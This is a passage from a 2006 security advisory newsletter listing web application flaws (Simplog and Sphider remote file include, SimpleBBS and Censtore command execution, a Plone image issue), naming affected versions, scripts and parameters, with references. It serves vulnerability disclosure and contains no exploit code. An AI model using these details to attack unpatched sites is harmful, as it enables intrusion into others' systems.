attackers to modify and delete portrait images of members. All
versions of Plone 2 are vulnerable.
Ref: http://plone.org/products/plonehotfix20060410/
______________________________________________________________________

06.15.80 CVE: Not Available
Platform: Web Application
Title: Simplog Remote File Include
Description: Simplog is a web log application. Insufficient
sanitization of the "s" parameter of the "doc/index.php" script
exposes the application to a remote file include issue. Simplog
version 0.9.2 is affected.
Ref: http://www.securityfocus.com/bid/17490
______________________________________________________________________

06.15.81 CVE: Not Available
Platform: Web Application
Title: SimpleBBS Remote Arbitrary Command Execution
Description: SimpleBBS is a web-based bulletin board application. It
is prone to an arbitrary command execution vulnerability due to
insufficient sanitization of user-supplied input to the "cmd"
parameter of "posts.php". SimpleBBS versions 1.1 and earlier are
vulnerable.
Ref: http://www.securityfocus.com/bid/17501
______________________________________________________________________

06.15.82 CVE: Not Available
Platform: Web Application
Title: Censtore Remote Arbitrary Command Execution
Description: Censtore is a web-based shopping cart system. It is prone
to an arbitrary command execution vulnerability due to insufficient
sanitization of user-supplied input to the "page" parameter of the
"censtore.cgi" script.
Ref: http://www.securityfocus.com/bid/17515
______________________________________________________________________

06.15.83 CVE: Not Available
Platform: Web Application
Title: Sphider Configset.PHP Remote File Include
Description: Sphider is a web-based spider and search engine
application. Insufficient sanitization of the "settings_dir" parameter
of the "admin/configset.php" script exposes the application to a
remote file include issue. Sphider version 1.3 is affected.
Ref: http://www.securityfocus.com/bid/17514
______________________________________________________________________

(c) 2006. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.

==end==

Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEQ9ba+LUG5KFpTkYRAmNWAJ9mNVsM803cFip0Twap9W8VztvofwCeNaZN
WJU3Y0b3G6HWn+jk0t5ZtQc=
=vtSf
-----END PGP SIGNATURE-----